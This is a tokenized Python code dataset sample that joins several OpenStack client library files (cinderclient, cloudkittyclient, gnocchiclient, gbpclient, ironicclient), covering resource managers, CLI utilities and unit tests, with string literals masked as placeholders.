display_manager . get ( '<STR_LIT>' ) , output ) <EOL> class CaptureStdout ( object ) : <EOL> """<STR_LIT>""" <EOL> def __enter__ ( self ) : <EOL> self . real_stdout = sys . stdout <EOL> self . stringio = moves . StringIO ( ) <EOL> sys . stdout = self . stringio <EOL> return self <EOL> def __exit__ ( self , * args ) : <EOL> sys . stdout = self . real_stdout <EOL> self . stringio . seek ( <NUM_LIT:0> ) <EOL> self . read = self . stringio . read <EOL> class PrintListTestCase ( test_utils . TestCase ) : <EOL> def test_print_list_with_list ( self ) : <EOL> Row = collections . 
namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> to_print = [ Row ( a = <NUM_LIT:3> , b = <NUM_LIT:4> ) , Row ( a = <NUM_LIT:1> , b = <NUM_LIT:2> ) ] <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( to_print , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> def test_print_list_with_None_data ( self ) : <EOL> Row = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> to_print = [ Row ( a = <NUM_LIT:3> , b = None ) , Row ( a = <NUM_LIT:1> , b = <NUM_LIT:2> ) ] <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( to_print , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> def test_print_list_with_list_sortby ( self ) : <EOL> Row = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> to_print = [ Row ( a = <NUM_LIT:4> , b = <NUM_LIT:3> ) , Row ( a = <NUM_LIT:2> , b = <NUM_LIT:1> ) ] <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( to_print , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , sortby_index = <NUM_LIT:1> ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> def test_print_list_with_list_no_sort ( self ) : <EOL> Row = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> to_print = [ Row ( a = <NUM_LIT:3> , b = <NUM_LIT:4> ) , Row ( a = <NUM_LIT:1> , b = <NUM_LIT:2> ) ] <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( to_print , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , sortby_index = None ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> def test_print_list_with_generator ( self ) : <EOL> Row = collections . 
namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> def gen_rows ( ) : <EOL> for row in [ Row ( a = <NUM_LIT:1> , b = <NUM_LIT:2> ) , Row ( a = <NUM_LIT:3> , b = <NUM_LIT:4> ) ] : <EOL> yield row <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( gen_rows ( ) , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> def test_print_list_with_return ( self ) : <EOL> Row = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> to_print = [ Row ( a = <NUM_LIT:3> , b = '<STR_LIT>' ) , Row ( a = <NUM_LIT:1> , b = '<STR_LIT>' ) ] <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_list ( to_print , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) <EOL> class PrintDictTestCase ( test_utils . TestCase ) : <EOL> def test_print_dict_with_return ( self ) : <EOL> d = { '<STR_LIT:a>' : '<STR_LIT:A>' , '<STR_LIT:b>' : '<STR_LIT:B>' , '<STR_LIT:c>' : '<STR_LIT:C>' , '<STR_LIT:d>' : '<STR_LIT>' } <EOL> with CaptureStdout ( ) as cso : <EOL> utils . print_dict ( d ) <EOL> self . assertEqual ( """<STR_LIT>""" , cso . read ( ) ) </s>
<s> from cinderclient . tests . unit import utils <EOL> from cinderclient . tests . unit . v2 import fakes <EOL> cs = fakes . FakeClient ( ) <EOL> class QuotaClassSetsTest ( utils . TestCase ) : <EOL> def test_class_quotas_get ( self ) : <EOL> class_name = '<STR_LIT:test>' <EOL> cls = cs . quota_classes . get ( class_name ) <EOL> cs . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % class_name ) <EOL> self . _assert_request_id ( cls ) <EOL> def test_update_quota ( self ) : <EOL> q = cs . quota_classes . get ( '<STR_LIT:test>' ) <EOL> q . update ( volumes = <NUM_LIT:2> , snapshots = <NUM_LIT:2> , gigabytes = <NUM_LIT> , <EOL> backups = <NUM_LIT:2> , backup_gigabytes = <NUM_LIT> , <EOL> consistencygroups = <NUM_LIT:2> , per_volume_gigabytes = <NUM_LIT:100> ) <EOL> cs . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _assert_request_id ( q ) <EOL> def test_refresh_quota ( self ) : <EOL> q = cs . quota_classes . get ( '<STR_LIT:test>' ) <EOL> q2 = cs . quota_classes . get ( '<STR_LIT:test>' ) <EOL> self . assertEqual ( q . volumes , q2 . volumes ) <EOL> self . assertEqual ( q . snapshots , q2 . snapshots ) <EOL> self . assertEqual ( q . gigabytes , q2 . gigabytes ) <EOL> self . assertEqual ( q . backups , q2 . backups ) <EOL> self . assertEqual ( q . backup_gigabytes , q2 . backup_gigabytes ) <EOL> self . assertEqual ( q . consistencygroups , q2 . consistencygroups ) <EOL> self . assertEqual ( q . per_volume_gigabytes , q2 . per_volume_gigabytes ) <EOL> q2 . volumes = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . volumes , q2 . volumes ) <EOL> q2 . snapshots = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . snapshots , q2 . snapshots ) <EOL> q2 . gigabytes = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . gigabytes , q2 . gigabytes ) <EOL> q2 . backups = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . backups , q2 . backups ) <EOL> q2 . backup_gigabytes = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . backup_gigabytes , q2 . backup_gigabytes ) <EOL> q2 . 
consistencygroups = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . consistencygroups , q2 . consistencygroups ) <EOL> q2 . per_volume_gigabytes = <NUM_LIT:0> <EOL> self . assertNotEqual ( q . per_volume_gigabytes , q2 . per_volume_gigabytes ) <EOL> q2 . get ( ) <EOL> self . assertEqual ( q . volumes , q2 . volumes ) <EOL> self . assertEqual ( q . snapshots , q2 . snapshots ) <EOL> self . assertEqual ( q . gigabytes , q2 . gigabytes ) <EOL> self . assertEqual ( q . backups , q2 . backups ) <EOL> self . assertEqual ( q . backup_gigabytes , q2 . backup_gigabytes ) <EOL> self . assertEqual ( q . consistencygroups , q2 . consistencygroups ) <EOL> self . assertEqual ( q . per_volume_gigabytes , q2 . per_volume_gigabytes ) <EOL> self . _assert_request_id ( q ) <EOL> self . _assert_request_id ( q2 ) </s>
<s> """<STR_LIT>""" <EOL> import six <EOL> from six . moves . urllib . parse import urlencode <EOL> from cinderclient import base <EOL> class Snapshot ( base . Resource ) : <EOL> """<STR_LIT>""" <EOL> NAME_ATTR = "<STR_LIT>" <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . id <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> self . manager . delete ( self ) <EOL> def update ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . manager . update ( self , ** kwargs ) <EOL> @ property <EOL> def progress ( self ) : <EOL> return self . _info . get ( '<STR_LIT>' ) <EOL> @ property <EOL> def project_id ( self ) : <EOL> return self . _info . get ( '<STR_LIT>' ) <EOL> def reset_state ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . manager . reset_state ( self , state ) <EOL> def set_metadata ( self , metadata ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . set_metadata ( self , metadata ) <EOL> def delete_metadata ( self , keys ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . delete_metadata ( self , keys ) <EOL> def update_all_metadata ( self , metadata ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . update_all_metadata ( self , metadata ) <EOL> class SnapshotManager ( base . ManagerWithFind ) : <EOL> """<STR_LIT>""" <EOL> resource_class = Snapshot <EOL> def create ( self , volume_id , force = False , <EOL> display_name = None , display_description = None ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : volume_id , <EOL> '<STR_LIT>' : force , <EOL> '<STR_LIT>' : display_name , <EOL> '<STR_LIT>' : display_description } } <EOL> return self . _create ( '<STR_LIT>' , body , '<STR_LIT>' ) <EOL> def get ( self , snapshot_id ) : <EOL> """<STR_LIT>""" <EOL> return self . _get ( "<STR_LIT>" % snapshot_id , "<STR_LIT>" ) <EOL> def list ( self , detailed = True , search_opts = None ) : <EOL> """<STR_LIT>""" <EOL> if search_opts is None : <EOL> search_opts = { } <EOL> qparams = { } <EOL> for opt , val in six . 
iteritems ( search_opts ) : <EOL> if val : <EOL> qparams [ opt ] = val <EOL> if qparams : <EOL> new_qparams = sorted ( qparams . items ( ) , key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> query_string = "<STR_LIT>" % urlencode ( new_qparams ) <EOL> else : <EOL> query_string = "<STR_LIT>" <EOL> detail = "<STR_LIT>" <EOL> if detailed : <EOL> detail = "<STR_LIT>" <EOL> return self . _list ( "<STR_LIT>" % ( detail , query_string ) , <EOL> "<STR_LIT>" ) <EOL> def delete ( self , snapshot ) : <EOL> """<STR_LIT>""" <EOL> self . _delete ( "<STR_LIT>" % base . getid ( snapshot ) ) <EOL> def update ( self , snapshot , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not kwargs : <EOL> return <EOL> body = { "<STR_LIT>" : kwargs } <EOL> self . _update ( "<STR_LIT>" % base . getid ( snapshot ) , body ) <EOL> def reset_state ( self , snapshot , state ) : <EOL> """<STR_LIT>""" <EOL> return self . _action ( '<STR_LIT>' , snapshot , { '<STR_LIT:status>' : state } ) <EOL> def _action ( self , action , snapshot , info = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> body = { action : info } <EOL> self . run_hooks ( '<STR_LIT>' , body , ** kwargs ) <EOL> url = '<STR_LIT>' % base . getid ( snapshot ) <EOL> return self . api . client . post ( url , body = body ) <EOL> def update_snapshot_status ( self , snapshot , update_dict ) : <EOL> return self . _action ( '<STR_LIT>' , <EOL> base . getid ( snapshot ) , update_dict ) <EOL> def set_metadata ( self , snapshot , metadata ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : metadata } <EOL> return self . _create ( "<STR_LIT>" % base . getid ( snapshot ) , <EOL> body , "<STR_LIT>" ) <EOL> def delete_metadata ( self , snapshot , keys ) : <EOL> """<STR_LIT>""" <EOL> snapshot_id = base . getid ( snapshot ) <EOL> for k in keys : <EOL> self . _delete ( "<STR_LIT>" % ( snapshot_id , k ) ) <EOL> def update_all_metadata ( self , snapshot , metadata ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : metadata } <EOL> return self . 
_update ( "<STR_LIT>" % base . getid ( snapshot ) , <EOL> body ) </s>
<s> """<STR_LIT>""" <EOL> from cinderclient import base <EOL> class Capabilities ( base . Resource ) : <EOL> NAME_ATTR = '<STR_LIT:name>' <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . name <EOL> class CapabilitiesManager ( base . Manager ) : <EOL> """<STR_LIT>""" <EOL> resource_class = Capabilities <EOL> def get ( self , host ) : <EOL> """<STR_LIT>""" <EOL> return self . _get ( '<STR_LIT>' % host , None ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> from six . moves . urllib import parse <EOL> from cloudkittyclient import exc <EOL> from cloudkittyclient . i18n import _ <EOL> from cloudkittyclient . openstack . common . apiclient import base <EOL> def getid ( obj ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return obj . id <EOL> except AttributeError : <EOL> return obj <EOL> class Manager ( object ) : <EOL> """<STR_LIT>""" <EOL> resource_class = None <EOL> def __init__ ( self , api ) : <EOL> self . api = api <EOL> @ property <EOL> def client ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . api <EOL> def _create ( self , url , body ) : <EOL> body = self . api . post ( url , json = body ) . json ( ) <EOL> if body : <EOL> return self . resource_class ( self , body ) <EOL> def _list ( self , url , response_key = None , obj_class = None , body = None , <EOL> expect_single = False ) : <EOL> resp = self . api . get ( url ) <EOL> if not resp . content : <EOL> raise exc . HTTPNotFound <EOL> body = resp . json ( ) <EOL> if obj_class is None : <EOL> obj_class = self . resource_class <EOL> if response_key : <EOL> try : <EOL> data = body [ response_key ] <EOL> except KeyError : <EOL> return [ ] <EOL> else : <EOL> data = body <EOL> if expect_single : <EOL> data = [ data ] <EOL> return [ obj_class ( self , res , loaded = True ) for res in data if res ] <EOL> def _update ( self , url , item , response_key = None ) : <EOL> if not item . dirty_fields : <EOL> return item <EOL> item = self . api . put ( url , json = item . dirty_fields ) . json ( ) <EOL> if item : <EOL> return self . resource_class ( self , item ) <EOL> def _delete ( self , url ) : <EOL> self . api . delete ( url ) <EOL> class CrudManager ( base . CrudManager ) : <EOL> """<STR_LIT>""" <EOL> base_url = None <EOL> def build_url ( self , base_url = None , ** kwargs ) : <EOL> base_url = base_url or self . base_url <EOL> return super ( CrudManager , self ) . 
build_url ( base_url , ** kwargs ) <EOL> def get ( self , ** kwargs ) : <EOL> kwargs = self . _filter_kwargs ( kwargs ) <EOL> return self . _get ( <EOL> self . build_url ( ** kwargs ) ) <EOL> def create ( self , ** kwargs ) : <EOL> kwargs = self . _filter_kwargs ( kwargs ) <EOL> return self . _post ( <EOL> self . build_url ( ** kwargs ) , kwargs ) <EOL> def update ( self , ** kwargs ) : <EOL> kwargs = self . _filter_kwargs ( kwargs ) <EOL> params = kwargs . copy ( ) <EOL> return self . _put ( <EOL> self . build_url ( ** kwargs ) , params ) <EOL> def findall ( self , base_url = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs = self . _filter_kwargs ( kwargs ) <EOL> rl = self . _list ( <EOL> '<STR_LIT>' % { <EOL> '<STR_LIT>' : self . build_url ( base_url = base_url , ** kwargs ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % parse . urlencode ( kwargs ) if kwargs else '<STR_LIT>' , <EOL> } , <EOL> self . collection_key ) <EOL> num = len ( rl ) <EOL> if num == <NUM_LIT:0> : <EOL> msg = _ ( "<STR_LIT>" ) % { <EOL> '<STR_LIT:name>' : self . resource_class . __name__ , <EOL> '<STR_LIT:args>' : kwargs <EOL> } <EOL> raise exc . HTTPNotFound ( msg ) <EOL> return rl <EOL> class Resource ( base . Resource ) : <EOL> """<STR_LIT>""" <EOL> key = None <EOL> def to_dict ( self ) : <EOL> return copy . deepcopy ( self . _info ) <EOL> @ property <EOL> def dirty_fields ( self ) : <EOL> out = self . to_dict ( ) <EOL> for k , v in self . _info . items ( ) : <EOL> if self . __dict__ [ k ] != v : <EOL> out [ k ] = self . __dict__ [ k ] <EOL> return out <EOL> def update ( self ) : <EOL> try : <EOL> return self . manager . update ( ** self . dirty_fields ) <EOL> except AttributeError : <EOL> raise exc . NotUpdatableError ( self ) </s>
<s> from cloudkittyclient . v1 . rating . hashmap import client <EOL> from cloudkittyclient . v1 . rating . hashmap import shell <EOL> class Extension ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def get_client ( http_client ) : <EOL> return client . Client ( http_client ) <EOL> @ staticmethod <EOL> def get_shell ( ) : <EOL> return shell </s>
<s> import os <EOL> import fixtures <EOL> import testtools <EOL> _TRUE_VALUES = ( '<STR_LIT:True>' , '<STR_LIT:true>' , '<STR_LIT:1>' , '<STR_LIT:yes>' ) <EOL> class TestCase ( testtools . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( TestCase , self ) . setUp ( ) <EOL> test_timeout = os . environ . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> try : <EOL> test_timeout = int ( test_timeout ) <EOL> except ValueError : <EOL> test_timeout = <NUM_LIT:0> <EOL> if test_timeout > <NUM_LIT:0> : <EOL> self . useFixture ( fixtures . Timeout ( test_timeout , gentle = True ) ) <EOL> self . useFixture ( fixtures . NestedTempfile ( ) ) <EOL> self . useFixture ( fixtures . TempHomeDir ( ) ) <EOL> if os . environ . get ( '<STR_LIT>' ) in _TRUE_VALUES : <EOL> stdout = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stdout ) ) <EOL> if os . environ . get ( '<STR_LIT>' ) in _TRUE_VALUES : <EOL> stderr = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stderr ) ) <EOL> self . log_fixture = self . useFixture ( fixtures . FakeLogger ( ) ) </s>
<s> import uuid <EOL> from gnocchiclient . tests . functional import base <EOL> class ResourceTypeClientTest ( base . ClientTestBase ) : <EOL> RESOURCE_TYPE = str ( uuid . uuid4 ( ) ) <EOL> def test_help ( self ) : <EOL> self . gnocchi ( "<STR_LIT>" , params = "<STR_LIT>" ) <EOL> def test_resource_type_scenario ( self ) : <EOL> result = self . gnocchi ( '<STR_LIT>' , params = "<STR_LIT:list>" ) <EOL> r = self . parser . listing ( result ) <EOL> self . assertEqual ( [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:name>' : '<STR_LIT>' } ] , r ) <EOL> result = self . gnocchi ( <EOL> u'<STR_LIT>' , <EOL> params = u"<STR_LIT>" <EOL> "<STR_LIT>" % self . RESOURCE_TYPE ) <EOL> resource = self . details_multiple ( result ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( self . RESOURCE_TYPE , resource [ "<STR_LIT:name>" ] ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" , <EOL> resource [ "<STR_LIT>" ] ) <EOL> result = self . gnocchi ( <EOL> u'<STR_LIT>' , params = u"<STR_LIT>" % self . RESOURCE_TYPE ) <EOL> resource = self . details_multiple ( result ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( self . RESOURCE_TYPE , resource [ "<STR_LIT:name>" ] ) <EOL> self . assertEqual ( <EOL> "<STR_LIT>" , <EOL> resource [ "<STR_LIT>" ] ) <EOL> result = self . gnocchi ( '<STR_LIT>' , <EOL> params = "<STR_LIT>" % self . RESOURCE_TYPE ) <EOL> self . assertEqual ( "<STR_LIT>" , result ) <EOL> result = self . gnocchi ( '<STR_LIT>' , <EOL> params = "<STR_LIT>" % self . RESOURCE_TYPE , <EOL> fail_ok = True , merge_stderr = True ) <EOL> self . assertFirstLineStartsWith ( <EOL> result . split ( '<STR_LIT:\n>' ) , <EOL> "<STR_LIT>" % self . RESOURCE_TYPE ) <EOL> result = self . gnocchi ( u'<STR_LIT>' , <EOL> params = u"<STR_LIT>" % self . RESOURCE_TYPE , <EOL> fail_ok = True , merge_stderr = True ) <EOL> self . assertFirstLineStartsWith ( <EOL> result . split ( '<STR_LIT:\n>' ) , <EOL> "<STR_LIT>" % self . RESOURCE_TYPE ) </s>
<s> from mox3 import mox <EOL> from neutronclient . common import exceptions <EOL> from neutronclient . tests . unit import test_cli20 as neutron_test_cli20 <EOL> import requests <EOL> from gbpclient . gbp import v2_0 as gbpV2_0 <EOL> from gbpclient import gbpshell <EOL> from gbpclient . v2_0 import client as gbpclient <EOL> API_VERSION = neutron_test_cli20 . API_VERSION <EOL> FORMAT = neutron_test_cli20 . FORMAT <EOL> TOKEN = neutron_test_cli20 . TOKEN <EOL> ENDURL = neutron_test_cli20 . ENDURL <EOL> capture_std_streams = neutron_test_cli20 . capture_std_streams <EOL> end_url = neutron_test_cli20 . end_url <EOL> class FakeStdout ( neutron_test_cli20 . FakeStdout ) : <EOL> pass <EOL> class MyResp ( neutron_test_cli20 . MyResp ) : <EOL> pass <EOL> class MyApp ( neutron_test_cli20 . MyApp ) : <EOL> pass <EOL> class MyUrlComparator ( neutron_test_cli20 . MyUrlComparator ) : <EOL> pass <EOL> class MyComparator ( neutron_test_cli20 . MyComparator ) : <EOL> pass <EOL> class CLITestV20Base ( neutron_test_cli20 . CLITestV20Base ) : <EOL> shell = gbpshell <EOL> client = gbpclient <EOL> def setUp ( self , plurals = None ) : <EOL> super ( CLITestV20Base , self ) . setUp ( ) <EOL> self . client = gbpclient . Client ( token = TOKEN , endpoint_url = self . endurl ) <EOL> def _test_create_resource ( self , resource , cmd , name , myid , args , <EOL> position_names , position_values , <EOL> tenant_id = None , tags = None , admin_state_up = True , <EOL> extra_body = None , cmd_resource = None , <EOL> parent_id = None , ** kwargs ) : <EOL> self . mox . StubOutWithMock ( cmd , "<STR_LIT>" ) <EOL> self . mox . StubOutWithMock ( self . client . httpclient , "<STR_LIT>" ) <EOL> cmd . get_client ( ) . MultipleTimes ( ) . AndReturn ( self . client ) <EOL> if not cmd_resource : <EOL> cmd_resource = resource <EOL> body = { resource : { } , } <EOL> if tenant_id : <EOL> body [ resource ] . update ( { '<STR_LIT>' : tenant_id } ) <EOL> if tags : <EOL> body [ resource ] . 
update ( { '<STR_LIT>' : tags } ) <EOL> if extra_body : <EOL> body [ resource ] . update ( extra_body ) <EOL> body [ resource ] . update ( kwargs ) <EOL> for i in range ( len ( position_names ) ) : <EOL> body [ resource ] . update ( { position_names [ i ] : position_values [ i ] } ) <EOL> ress = { resource : <EOL> { self . id_field : myid } , } <EOL> if name : <EOL> ress [ resource ] . update ( { '<STR_LIT:name>' : name } ) <EOL> self . client . format = self . format <EOL> resstr = self . client . serialize ( ress ) <EOL> resource_plural = gbpV2_0 . _get_resource_plural ( cmd_resource , <EOL> self . client ) <EOL> path = getattr ( self . client , resource_plural + "<STR_LIT>" ) <EOL> if parent_id : <EOL> path = path % parent_id <EOL> if self . format == '<STR_LIT>' : <EOL> mox_body = MyComparator ( body , self . client ) <EOL> else : <EOL> mox_body = self . client . serialize ( body ) <EOL> self . client . httpclient . request ( <EOL> end_url ( path , format = self . format ) , '<STR_LIT:POST>' , <EOL> body = mox_body , <EOL> headers = mox . ContainsKeyValue ( <EOL> '<STR_LIT>' , TOKEN ) ) . AndReturn ( ( MyResp ( <NUM_LIT:200> ) , resstr ) ) <EOL> args . extend ( [ '<STR_LIT>' , self . format ] ) <EOL> self . mox . ReplayAll ( ) <EOL> cmd_parser = cmd . get_parser ( '<STR_LIT>' + resource ) <EOL> gbpshell . run_command ( cmd , cmd_parser , args ) <EOL> self . mox . VerifyAll ( ) <EOL> self . mox . UnsetStubs ( ) <EOL> _str = self . fake_stdout . make_string ( ) <EOL> self . assertIn ( myid , _str ) <EOL> if name : <EOL> self . 
assertIn ( name , _str ) <EOL> class ClientV2TestJson ( CLITestV20Base ) : <EOL> pass <EOL> class CLITestV20ExceptionHandler ( CLITestV20Base ) : <EOL> def _test_exception_handler_v20 ( <EOL> self , expected_exception , status_code , expected_msg , <EOL> error_type = None , error_msg = None , error_detail = None , <EOL> error_content = None ) : <EOL> if error_content is None : <EOL> error_content = { '<STR_LIT>' : { '<STR_LIT:type>' : error_type , <EOL> '<STR_LIT:message>' : error_msg , <EOL> '<STR_LIT>' : error_detail } } <EOL> e = self . assertRaises ( expected_exception , <EOL> gbpclient . exception_handler_v20 , <EOL> status_code , error_content ) <EOL> self . assertEqual ( status_code , e . status_code ) <EOL> if expected_msg is None : <EOL> if error_detail : <EOL> expected_msg = '<STR_LIT:\n>' . join ( [ error_msg , error_detail ] ) <EOL> else : <EOL> expected_msg = error_msg <EOL> self . assertEqual ( expected_msg , e . message ) <EOL> def test_exception_handler_v20_neutron_known_error ( self ) : <EOL> pass <EOL> def test_exception_handler_v20_neutron_known_error_without_detail ( self ) : <EOL> pass <EOL> def test_exception_handler_v20_unknown_error_to_per_code_exception ( self ) : <EOL> for status_code , client_exc in exceptions . HTTP_EXCEPTION_MAP . items ( ) : <EOL> error_msg = '<STR_LIT>' <EOL> error_detail = '<STR_LIT>' <EOL> self . _test_exception_handler_v20 ( <EOL> client_exc , status_code , <EOL> error_msg + '<STR_LIT:\n>' + error_detail , <EOL> '<STR_LIT>' , error_msg , error_detail ) <EOL> def test_exception_handler_v20_neutron_unknown_status_code ( self ) : <EOL> error_msg = '<STR_LIT>' <EOL> error_detail = '<STR_LIT>' <EOL> self . _test_exception_handler_v20 ( <EOL> exceptions . 
NeutronClientException , <NUM_LIT> , <EOL> error_msg + '<STR_LIT:\n>' + error_detail , <EOL> '<STR_LIT>' , error_msg , error_detail ) <EOL> def test_exception_handler_v20_bad_neutron_error ( self ) : <EOL> error_content = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . _test_exception_handler_v20 ( <EOL> exceptions . NeutronClientException , <NUM_LIT> , <EOL> expected_msg = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> error_content = error_content ) <EOL> def test_exception_handler_v20_error_dict_contains_message ( self ) : <EOL> error_content = { '<STR_LIT:message>' : '<STR_LIT>' } <EOL> self . _test_exception_handler_v20 ( <EOL> exceptions . NeutronClientException , <NUM_LIT> , <EOL> expected_msg = '<STR_LIT>' , <EOL> error_content = error_content ) <EOL> def test_exception_handler_v20_error_dict_not_contain_message ( self ) : <EOL> error_content = { '<STR_LIT:error>' : '<STR_LIT>' } <EOL> expected_msg = '<STR_LIT>' % ( <NUM_LIT> , error_content ) <EOL> self . _test_exception_handler_v20 ( <EOL> exceptions . NeutronClientException , <NUM_LIT> , <EOL> expected_msg = expected_msg , <EOL> error_content = error_content ) <EOL> def test_exception_handler_v20_default_fallback ( self ) : <EOL> error_content = '<STR_LIT>' <EOL> expected_msg = '<STR_LIT>' % ( <NUM_LIT> , error_content ) <EOL> self . _test_exception_handler_v20 ( <EOL> exceptions . NeutronClientException , <NUM_LIT> , <EOL> expected_msg = expected_msg , <EOL> error_content = error_content ) <EOL> def test_exception_status ( self ) : <EOL> e = exceptions . BadRequest ( ) <EOL> self . assertEqual ( e . status_code , <NUM_LIT> ) <EOL> e = exceptions . BadRequest ( status_code = <NUM_LIT> ) <EOL> self . assertEqual ( e . status_code , <NUM_LIT> ) <EOL> e = exceptions . SslCertificateValidationError ( ) <EOL> self . assertIsNotNone ( e . status_code ) <EOL> e = exceptions . SslCertificateValidationError ( status_code = <NUM_LIT> ) <EOL> self . assertEqual ( e . 
status_code , <NUM_LIT> ) <EOL> def test_connection_failed ( self ) : <EOL> self . mox . StubOutWithMock ( self . client . httpclient , '<STR_LIT>' ) <EOL> self . client . httpclient . auth_token = '<STR_LIT>' <EOL> self . client . httpclient . request ( <EOL> end_url ( '<STR_LIT>' ) , '<STR_LIT:GET>' , <EOL> headers = mox . ContainsKeyValue ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) . AndRaise ( requests . exceptions . ConnectionError ( '<STR_LIT>' ) ) <EOL> self . mox . ReplayAll ( ) <EOL> error = self . assertRaises ( exceptions . ConnectionFailed , <EOL> self . client . get , '<STR_LIT>' ) <EOL> self . assertIsNotNone ( error . status_code ) <EOL> self . mox . VerifyAll ( ) <EOL> self . mox . UnsetStubs ( ) </s>
<s> from __future__ import print_function <EOL> import getpass <EOL> import inspect <EOL> import json <EOL> import os <EOL> import sys <EOL> import textwrap <EOL> from oslo_utils import encodeutils <EOL> from oslo_utils import strutils <EOL> import prettytable <EOL> import six <EOL> from six import moves <EOL> from ironicclient . common . i18n import _ <EOL> class MissingArgs ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , missing ) : <EOL> self . missing = missing <EOL> msg = _ ( "<STR_LIT>" ) % "<STR_LIT:U+002CU+0020>" . join ( missing ) <EOL> super ( MissingArgs , self ) . __init__ ( msg ) <EOL> def validate_args ( fn , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> argspec = inspect . getargspec ( fn ) <EOL> num_defaults = len ( argspec . defaults or [ ] ) <EOL> required_args = argspec . args [ : len ( argspec . args ) - num_defaults ] <EOL> def isbound ( method ) : <EOL> return getattr ( method , '<STR_LIT>' , None ) is not None <EOL> if isbound ( fn ) : <EOL> required_args . pop ( <NUM_LIT:0> ) <EOL> missing = [ arg for arg in required_args if arg not in kwargs ] <EOL> missing = missing [ len ( args ) : ] <EOL> if missing : <EOL> raise MissingArgs ( missing ) <EOL> def arg ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> def _decorator ( func ) : <EOL> add_arg ( func , * args , ** kwargs ) <EOL> return func <EOL> return _decorator <EOL> def env ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for arg in args : <EOL> value = os . environ . get ( arg ) <EOL> if value : <EOL> return value <EOL> return kwargs . get ( '<STR_LIT:default>' , '<STR_LIT>' ) <EOL> def add_arg ( func , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( func , '<STR_LIT>' ) : <EOL> func . arguments = [ ] <EOL> if ( args , kwargs ) not in func . arguments : <EOL> func . arguments . insert ( <NUM_LIT:0> , ( args , kwargs ) ) <EOL> def unauthenticated ( func ) : <EOL> """<STR_LIT>""" <EOL> func . 
